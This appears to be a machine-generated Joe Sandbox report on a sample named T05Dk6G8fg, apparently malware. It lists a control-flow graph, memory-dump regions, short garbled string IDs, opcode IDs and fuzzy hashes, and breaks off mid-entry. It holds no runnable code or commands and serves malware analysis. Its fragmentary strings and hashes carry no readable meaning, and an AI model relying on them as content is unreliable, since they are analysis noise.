                                      control_flow_graph 5510 2d42878-2d42883 5511 2d42885-2d4288b 5510->5511 5512 2d4289b-2d4289f 5510->5512 5513 2d4288d 5511->5513 5514 2d4288f-2d42899 5511->5514 5515 2d428a1-2d428a7 5512->5515 5516 2d428b9-2d428bf 5512->5516 5513->5512 5514->5512 5517 2d428a9 5515->5517 5518 2d428ab-2d428b7 5515->5518 5519 2d428c5-2d428c7 5516->5519 5520 2d428c1-2d428c3 5516->5520 5517->5516 5518->5516 5525 2d428ca call 8186079 5519->5525 5526 2d428ca call 81862a9 5519->5526 5527 2d428ca call 8185f0a 5519->5527 5528 2d428ca call 8185c00 5519->5528 5529 2d428ca call 8185bf3 5519->5529 5530 2d428ca call 8185d75 5519->5530 5522 2d428d5-2d428d8 5520->5522 5524 2d428cc-2d428ce 5524->5522 5525->5524 5526->5524 5527->5524 5528->5524 5529->5524 5530->5524
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'7r$4'7r$LR7r$LR7r
                                      • API String ID: 0-2782078872
                                      • Opcode ID: 20c88a852ec3a2f12351a752cd951d007ee916ee591130c095d5e37f64d7d931
                                      • Instruction ID: 2abbfd8dbdb64f4c1fd6bbea621667bf0312fc3a87f6f9284a53eed9272cf882
                                      • Opcode Fuzzy Hash: 20c88a852ec3a2f12351a752cd951d007ee916ee591130c095d5e37f64d7d931
                                      • Instruction Fuzzy Hash: CEF02E34B006128B8B6D461D8518B3E36A29BCA62132440BEFC46EB322CF21CC02C7C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (;r$H;r
                                      • API String ID: 0-1362168202
                                      • Opcode ID: f2b0631738d98242046cee3449c6dcf94f7977c319d746d490a2365e2235a2ab
                                      • Instruction ID: 0e022ab493180a246a26c996b499f8ef3b751646845b8af7246c6258c845a7d2
                                      • Opcode Fuzzy Hash: f2b0631738d98242046cee3449c6dcf94f7977c319d746d490a2365e2235a2ab
                                      • Instruction Fuzzy Hash: 0A712131A003049FDB54EFA8C89066E7BF6EFC5320F1485AAE945CB391DA35AD05CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (;r$H;r
                                      • API String ID: 0-1362168202
                                      • Opcode ID: 25eded21d27efa720d5329f515b833207e5b8494e99602db4aba0be05d653cca
                                      • Instruction ID: a34a85273d1affc78690a985aa86ada576f53e5d87090acae4c7d2c7dd4a6a9b
                                      • Opcode Fuzzy Hash: 25eded21d27efa720d5329f515b833207e5b8494e99602db4aba0be05d653cca
                                      • Instruction Fuzzy Hash: 89410831B042904FD7566B7984787BE7FE6AFC6220F1844AED546CB381DE3A8D06C792
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: \;7r$\;7r
                                      • API String ID: 0-843996538
                                      • Opcode ID: 07709a83d72828da3558d7ec371e98e2fe1c6cdd54ad51c47939d3a06ba0c2cf
                                      • Instruction ID: cef9a733ac56e530b216b23726bdcb208de637a67f4e6f469dfe160155246692
                                      • Opcode Fuzzy Hash: 07709a83d72828da3558d7ec371e98e2fe1c6cdd54ad51c47939d3a06ba0c2cf
                                      • Instruction Fuzzy Hash: 9541F877F002399BEB14DAA9C9447AEBBF2BB89300F194069D901BF791DB719C05CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /~1q$6A4{
                                      • API String ID: 0-542456049
                                      • Opcode ID: 00ef4353c9a09a7568105e173e53f2c08792dcff6403a637189289e2ade45800
                                      • Instruction ID: 6095b5baa091c7c038faae8e64a780116fc057296938bed7e7fb3c1683b23c38
                                      • Opcode Fuzzy Hash: 00ef4353c9a09a7568105e173e53f2c08792dcff6403a637189289e2ade45800
                                      • Instruction Fuzzy Hash: 2B412731E012159FC745DB28D88199AFBF2EF85310B1985AADA19DF346D731ED42CBD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /~1q$6A4{
                                      • API String ID: 0-542456049
                                      • Opcode ID: d2543c9749f114c13a2f84c8b7a12983158880150db96f2d33d0a3fe41e17a7e
                                      • Instruction ID: 4e326262f84353fae6edd79ab98410cf89f6fee45ed15dd983b99a0051f9b42f
                                      • Opcode Fuzzy Hash: d2543c9749f114c13a2f84c8b7a12983158880150db96f2d33d0a3fe41e17a7e
                                      • Instruction Fuzzy Hash: 4F417175E001148FCB44EB59C580969F7E2EFC4314B2A84AADA1AEB345D772FD52CBD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r$$7r
                                      • API String ID: 0-1179443953
                                      • Opcode ID: 90ec50af21a5c50b20bd8a07811ed7d12f1a528168394e4df00922dad5501735
                                      • Instruction ID: 6ff31714e4755be12f50ab24c4a7784e3fd654b29d1b3b5d2b100ea05158df80
                                      • Opcode Fuzzy Hash: 90ec50af21a5c50b20bd8a07811ed7d12f1a528168394e4df00922dad5501735
                                      • Instruction Fuzzy Hash: DD315A62A0E3D20FDB17173469392A47FB11EA322434E44DBD8C0CF2A7DA054C4BC716
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r$$7r
                                      • API String ID: 0-1179443953
                                      • Opcode ID: 7c2a33bd0d41e9fda4abed6ab3399d4d9dee3ff0b0cf20c05948066dbcbeb586
                                      • Instruction ID: eee6a340a0c2bd741c13308a7d641d6893065ffd06ab989b938266edbde6b71d
                                      • Opcode Fuzzy Hash: 7c2a33bd0d41e9fda4abed6ab3399d4d9dee3ff0b0cf20c05948066dbcbeb586
                                      • Instruction Fuzzy Hash: 39212635B0D3D09FCB1A473CA9245657F759EC722A35940FBC289CB357CA268C02C792
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r$$7r
                                      • API String ID: 0-1179443953
                                      • Opcode ID: 1b5cb4091dc2b12d4f36e87fcfeb469b0e16b959c6e94d7f2cdec16aab1ddf7c
                                      • Instruction ID: 972fe4fa07b96272989a952882525e135ea84782356cc01aa2dba59b2c94babd
                                      • Opcode Fuzzy Hash: 1b5cb4091dc2b12d4f36e87fcfeb469b0e16b959c6e94d7f2cdec16aab1ddf7c
                                      • Instruction Fuzzy Hash: 0201B9B2B042554B6B995B9D4450D7BB79A9BC515073440BFD09587750EF31CC02C751
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Lluq$$7r
                                      • API String ID: 0-384248556
                                      • Opcode ID: a7003060bd9269173b34801ada78804c80d5f805401ff9f5acf93fa6c49f12f9
                                      • Instruction ID: 6187e2603ad2b5707c724588c81a98379301afa4c2ae76f412ed335647ed834a
                                      • Opcode Fuzzy Hash: a7003060bd9269173b34801ada78804c80d5f805401ff9f5acf93fa6c49f12f9
                                      • Instruction Fuzzy Hash: 4B11E571A0D3DA8FCB359F2499505AABF74EF87211B19416BD48A97312DF31CC81CB62
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r$$7r
                                      • API String ID: 0-1179443953
                                      • Opcode ID: 52d5295db216e54e9203278b12cb94ade9f7abcfde8fa3ac979c6516efb857ea
                                      • Instruction ID: d6345744f737b53567fb058a2084e4e638087a27848eb2a69808f09d65e51e75
                                      • Opcode Fuzzy Hash: 52d5295db216e54e9203278b12cb94ade9f7abcfde8fa3ac979c6516efb857ea
                                      • Instruction Fuzzy Hash: 18018126F0E7D14FD76B463805202656FB25ED312033A81FB84D8DB396DA26DC8ACB52
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r$$7r
                                      • API String ID: 0-1179443953
                                      • Opcode ID: 83bca90372e1b27fb8a802e0f0575c57bdc64bc7713ecd5120732e6a7219f84f
                                      • Instruction ID: 5ae7bd53b93db8d2acac18965ae054420defd7a404cfbf823c5bd13b02dfb687
                                      • Opcode Fuzzy Hash: 83bca90372e1b27fb8a802e0f0575c57bdc64bc7713ecd5120732e6a7219f84f
                                      • Instruction Fuzzy Hash: 2C01F471F093928FDB66462C48382EAABA29FC612071841EBD4C5D7356DE348C82C752
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: XX7r$XX7r
                                      • API String ID: 0-4097132800
                                      • Opcode ID: 8794dcbeb654b6b60aa88b5c60bbb6c9d6cf6075af701130eb11e930e75cb9a0
                                      • Instruction ID: 39ebc3d1ff2b22941b6029a842d153f78ea10ae1aaee57cafe24e7261291e125
                                      • Opcode Fuzzy Hash: 8794dcbeb654b6b60aa88b5c60bbb6c9d6cf6075af701130eb11e930e75cb9a0
                                      • Instruction Fuzzy Hash: F3F0962170D3D05FC31342A918B56A66FF65B8712075E40EBDAC5DB3D3D9188C49CB62
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r$$7r
                                      • API String ID: 0-1179443953
                                      • Opcode ID: 98aedd59ac063eba9472ce3aadccf6bef0d9fe9aa080d918ef63e556185a44df
                                      • Instruction ID: 290de11941a210c285cb708b1265f3e955601b8cfac017192b351329562c92fd
                                      • Opcode Fuzzy Hash: 98aedd59ac063eba9472ce3aadccf6bef0d9fe9aa080d918ef63e556185a44df
                                      • Instruction Fuzzy Hash: 21F09021F0E7D20FEB6E523D05206652B622ED702172E80EBC2D1CB796CE168C43CB92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r$$7r
                                      • API String ID: 0-1179443953
                                      • Opcode ID: c90f59d7de344ca1cf79de5ce572ef9ebc5cf6f0f1d1f799e61b7de229fec1b6
                                      • Instruction ID: e2eaea4e50888eea5f92308ac606f317cdd6f70d249844e0ed3037dd393a3a3f
                                      • Opcode Fuzzy Hash: c90f59d7de344ca1cf79de5ce572ef9ebc5cf6f0f1d1f799e61b7de229fec1b6
                                      • Instruction Fuzzy Hash: A0F03A22B0E3D14FD75B426C18641A56FB19E8702434A01E7C0C1CB297D9285C0AC7A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r$$7r
                                      • API String ID: 0-1179443953
                                      • Opcode ID: a103c7430ba03d7c2193a05b46f7032310b5c154dd8075d463fa1d9e7acee7c2
                                      • Instruction ID: c4e36782a55f1fdb93efa3203dcbb1d375fbaa3e40a979403dea2fe2fea75472
                                      • Opcode Fuzzy Hash: a103c7430ba03d7c2193a05b46f7032310b5c154dd8075d463fa1d9e7acee7c2
                                      • Instruction Fuzzy Hash: F3F0A925B0E7D00FEB6B123818702A53FA28E9712131E40EBC9C0CB397CC188C0BC3A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (o7r$H;r
                                      • API String ID: 0-2873274962
                                      • Opcode ID: f550086c084aa43bf527d1ec917de4216021e8d1606cf57581485f61f79cf2bc
                                      • Instruction ID: e1509e6e0193bb151f569aea7c678e043ddc09284e33fab02e00100c56937a07
                                      • Opcode Fuzzy Hash: f550086c084aa43bf527d1ec917de4216021e8d1606cf57581485f61f79cf2bc
                                      • Instruction Fuzzy Hash: 5EF0E222E0A3A14FD791A7B998142AC3BB16F82100B2480EBC809DB282CE780C05CF62
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'7r$4'7r
                                      • API String ID: 0-357556058
                                      • Opcode ID: 5070ebb5c0f128be621ab023405b9ede4ebc83983ee92c5c5ec3bee2b44f8dbb
                                      • Instruction ID: ee340a8bb2c3a2a89316bbb34aba93bb8f0943c5502ed9a6b0e04deef7c2825d
                                      • Opcode Fuzzy Hash: 5070ebb5c0f128be621ab023405b9ede4ebc83983ee92c5c5ec3bee2b44f8dbb
                                      • Instruction Fuzzy Hash: 82D05E38B002458F8B8C969CE6A0A3633E6ABCA51136080B895498B362DE32AC01C601
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: H;r
                                      • API String ID: 0-4066620683
                                      • Opcode ID: c614d87d7dcbc80576a18253e4dce3770cd6c0e565a84469c619355e32a0b303
                                      • Instruction ID: a73de11596de84b2554f2f1d68f3716e0176bf160ea0507de0cbc72d08b530d6
                                      • Opcode Fuzzy Hash: c614d87d7dcbc80576a18253e4dce3770cd6c0e565a84469c619355e32a0b303
                                      • Instruction Fuzzy Hash: EB61C237F002258FDB14DF68D88499ABBB2FF8521435541AADD15EF3A2DA35DC02CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2#h
                                      • API String ID: 0-665057935
                                      • Opcode ID: ab68d5b751282c695480d5f4c120beaffee36da39f44738a75ded5bd1e75c12d
                                      • Instruction ID: 80c43c2e3bb7d9db3faefbf531b20380b240bd736ce4040bc489545b5446be62
                                      • Opcode Fuzzy Hash: ab68d5b751282c695480d5f4c120beaffee36da39f44738a75ded5bd1e75c12d
                                      • Instruction Fuzzy Hash: 6C61F136B01215DFD705DF68D88096AFBA2EF89310B19C5AEE819DB351DB31EC06CB90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Te7r
                                      • API String ID: 0-87817734
                                      • Opcode ID: b7768a0933147be7aadc51ef5e5ae7da32666d865915f3757c8356d78fa070d1
                                      • Instruction ID: b2c8f21287e40c88ea26118b9fe7b0087b0c41bd0468bbf86bacbdd49676f8a6
                                      • Opcode Fuzzy Hash: b7768a0933147be7aadc51ef5e5ae7da32666d865915f3757c8356d78fa070d1
                                      • Instruction Fuzzy Hash: 00616C30A00604CFDB64DF29D498B6ABBF2FF88714F14895EE546877A0CB75E845CBA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: H;r
                                      • API String ID: 0-4066620683
                                      • Opcode ID: 10d344b0124b0edcbdb32b59df02c62cf188ccd7674037895ad2f1fdffb5c370
                                      • Instruction ID: daae837478d8d71a698b77a8b4cae2ff87f703337416f2db2a8eb0ab81978b4f
                                      • Opcode Fuzzy Hash: 10d344b0124b0edcbdb32b59df02c62cf188ccd7674037895ad2f1fdffb5c370
                                      • Instruction Fuzzy Hash: AF5111319153418FCF45CF3AC8942A9BFF1FF85310F1582AAC9449B256EB74D94ACBA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /*L
                                      • API String ID: 0-1965732946
                                      • Opcode ID: e1fcbc3195f9ae0932fe9d95e1ce2f3c0eeab6f712fa144f76795e2546dafab8
                                      • Instruction ID: ec39564b1903744449be5767770b23f459a1f2ac3131d2366481b765dde4f0ba
                                      • Opcode Fuzzy Hash: e1fcbc3195f9ae0932fe9d95e1ce2f3c0eeab6f712fa144f76795e2546dafab8
                                      • Instruction Fuzzy Hash: 9241E236F001258FC708DB69C99489AF7A2AF98310B1A8269DD59AB351DB71EC12CFD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: H;r
                                      • API String ID: 0-4066620683
                                      • Opcode ID: 268941936f188bb3f148fe92f0b43ddc7836c07e805083cbc5d20a56359dcfe1
                                      • Instruction ID: bb26c78ae6bccd6928d37cd658b4cabb4e5b995cf1d1e3eb73dd380ae7715c04
                                      • Opcode Fuzzy Hash: 268941936f188bb3f148fe92f0b43ddc7836c07e805083cbc5d20a56359dcfe1
                                      • Instruction Fuzzy Hash: 22412331B043404FD756EBB8C4643AE7BF2AFC9210B1489A9D482CB792DF399D45C792
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: /*L
                                      • API String ID: 0-1965732946
                                      • Opcode ID: 9fc2c3cf42f4c81593bf4d5d1edc340d72a6b8caf152c3b0704a80c53831c6f5
                                      • Instruction ID: 8027a3c4605c6b43ed387cf38fc4f7c0adb8df4d25bcd178c42907a86b640119
                                      • Opcode Fuzzy Hash: 9fc2c3cf42f4c81593bf4d5d1edc340d72a6b8caf152c3b0704a80c53831c6f5
                                      • Instruction Fuzzy Hash: 8141E536F005258BC708DF59D99489AF7A2AF98320B16C669DC59AF350DB71EC52CFC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +C
                                      • API String ID: 0-2106882527
                                      • Opcode ID: e8b76981304f59eaec03b5b8af0527996afe468b6199725459c6b0f0521ea9dd
                                      • Instruction ID: 553739cebacdbf25a67f6eaa7382dd7703ea619ac3ab338ff092e96a9943c1f3
                                      • Opcode Fuzzy Hash: e8b76981304f59eaec03b5b8af0527996afe468b6199725459c6b0f0521ea9dd
                                      • Instruction Fuzzy Hash: 3E31CF32B053569FD705EB68DC5199ABFF2EF82114305859AE808DF212D7346D0AC7E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973641446.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_1520000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: H;r
                                      • API String ID: 0-4066620683
                                      • Opcode ID: ec26a3263b08d7be90b80a6e2a9aa95ad67677fd3b8b8beb35a3c6230c0e8e33
                                      • Instruction ID: 43b05406cdce830b4e0695f8f3dda968ca58feae6d9c6d1c4f60c7cb439c5e01
                                      • Opcode Fuzzy Hash: ec26a3263b08d7be90b80a6e2a9aa95ad67677fd3b8b8beb35a3c6230c0e8e33
                                      • Instruction Fuzzy Hash: FF319A327002268FC755EB79C85456E7BF6BFCA21072405BDE51ADF3A1CA36AC06CB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: :,D
                                      • API String ID: 0-4270504621
                                      • Opcode ID: ef986a4699d6d900f7800cae4714ae9db265c6f83a395ba3edef653a0e2d29b1
                                      • Instruction ID: 03eba12424b7228c598cb2a488585723dff7a94b88a13bf698e08394fdc404d4
                                      • Opcode Fuzzy Hash: ef986a4699d6d900f7800cae4714ae9db265c6f83a395ba3edef653a0e2d29b1
                                      • Instruction Fuzzy Hash: C0315971E052658FC725DB689C405D9BFF2EF89210F0A81EBE848EB352DB308D05CBA0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43985105910.0000000006CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06CD0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_6cd0000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: #
                                      • API String ID: 0-1643561781
                                      • Opcode ID: 9f081a8f6c8cf5353ea01a627761001f007caf43b1f59a20066a4d0efaf51375
                                      • Instruction ID: 68d65d89ff669b017819e19397a440bbf867a12b7e78e214e52854462f97e985
                                      • Opcode Fuzzy Hash: 9f081a8f6c8cf5353ea01a627761001f007caf43b1f59a20066a4d0efaf51375
                                      • Instruction Fuzzy Hash: 8E310131A002096FDB41EB65D940BAFBBE6FF84210F148929E259CB740DB74EE00CBE0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43987868646.0000000008180000.00000040.00000800.00020000.00000000.sdmp, Offset: 08180000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8180000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: +C
                                      • API String ID: 0-2106882527
                                      • Opcode ID: f3dc744fa53e05b3990cf726bdcdbac27df0294b7b9bb790a30e621904d5c4a8
                                      • Instruction ID: eea0e5e7bc30c853a9b337e01d037337c3e4b87dfa0cf6b0ecc1423e03a4d0a3
                                      • Opcode Fuzzy Hash: f3dc744fa53e05b3990cf726bdcdbac27df0294b7b9bb790a30e621904d5c4a8
                                      • Instruction Fuzzy Hash: B8210B36B1032A9BDB14EB69E94599EB7E2FFC02143018A19E818AF704DB30AD058BD1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r
                                      • API String ID: 0-974610286
                                      • Opcode ID: c9da6c9be07767684fee4b460478023403b78e4c65a759c8a5324a6810ba132b
                                      • Instruction ID: 83e0d85abdd322fa08f42a623c95ccb1d3a9bdba12307b90177396f2f230f6a0
                                      • Opcode Fuzzy Hash: c9da6c9be07767684fee4b460478023403b78e4c65a759c8a5324a6810ba132b
                                      • Instruction Fuzzy Hash: B711CEB2A0C3C04FDB664B6C5861DAA7F759E8212032941EBD0C0CB692DB358C05C762
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $7r
                                      • API String ID: 0-974610286
                                      • Opcode ID: fc0c384d39672160de60a936f7281aaccd87c37edbc9e9b43be15d2c5d7e874d
                                      • Instruction ID: 5d5b3f25e52ab057033bac55baebec490b5c232514fbe94a73d93869dcbd27c5
                                      • Opcode Fuzzy Hash: fc0c384d39672160de60a936f7281aaccd87c37edbc9e9b43be15d2c5d7e874d
                                      • Instruction Fuzzy Hash: 53F0F225B4E3D18FCB27136898201657F322A9319071E80EBC4C9CABA7CA29CCC6C352
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'7r
                                      • API String ID: 0-1292062891
                                      • Opcode ID: c91342c9a62e9a9ea31c02196d15de9438231e3753cccb44e946fc6f985117b2
                                      • Instruction ID: d938ba05c8be78f8ccd9c7f8cea4b8d02deac63b365116ee9c1fcf4b0c6cc328
                                      • Opcode Fuzzy Hash: c91342c9a62e9a9ea31c02196d15de9438231e3753cccb44e946fc6f985117b2
                                      • Instruction Fuzzy Hash: 61E01225A092C05FCB1A477595B14A83F729FA711531981E7D9C5CB7A3DA1A4C07C702
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.43973845940.0000000002D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_2d40000_T05Dk6G8fg.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4quq
                                      • API String ID: 0-2121563796
                                      • Opcode ID: 6b90856d24f8a6ea1e1df4bbafdcad85d0399c4b3dd694b96ab18d022abdafc3
